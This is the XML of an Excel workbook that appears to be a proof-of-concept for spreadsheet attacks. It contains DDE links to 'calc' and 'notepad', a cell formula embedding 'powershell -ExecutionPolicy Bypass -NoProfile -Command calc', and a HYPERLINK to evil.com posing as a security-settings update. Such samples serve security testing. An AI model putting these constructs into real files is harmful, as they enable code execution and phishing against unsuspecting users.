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nu's World\Downloads\Security\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D9BAC7D1-8F1F-465B-92A5-88DD98230AB4}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="16440" xr2:uid="{F0DBC2AF-ACAC-441D-B20E-748158373B4A}"/>
  </bookViews>
  <sheets>
    <sheet name="Book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 a="1"/>
  <c r="A5" i="1" s="1"/>
  <c r="A6" i="1" a="1"/>
  <c r="A6" i="1" s="1"/>
  <c r="A7" i="1"/>
  <c r="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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">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</sst>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notepad">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1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calc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3874-6687-457C-9BFA-4EEDFE437F5C}">
  <dimension ref="A5:D21"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="E15" sqref="E15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A5" t="e" cm="1">
        <f t="array" ref="A5">[2]!A0</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A6" t="e" cm="1">
        <f t="array" ref="A6">[1]!_xlbgnm.A1</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="7" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A7" t="e">
        <f>POWER("powershell -ExecutionPolicy Bypass -NoProfile -Command calc",1)</f>
        <v>#VALUE!</v>
      </c>
    </row>
    <row r="8" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="str">
        <f>HYPERLINK("http://evil.com", "Click here to update security settings")</f>
        <v>Click here to update security settings</v>
      </c>
    </row>
    <row r="21" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D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Chinnu's World</dc:creator>
  <cp:lastModifiedBy>Chinmaya Ramana A G</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-05T14:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-05T14:16:53Z</dcterms:modified>
</cp:coreProperties>
</file>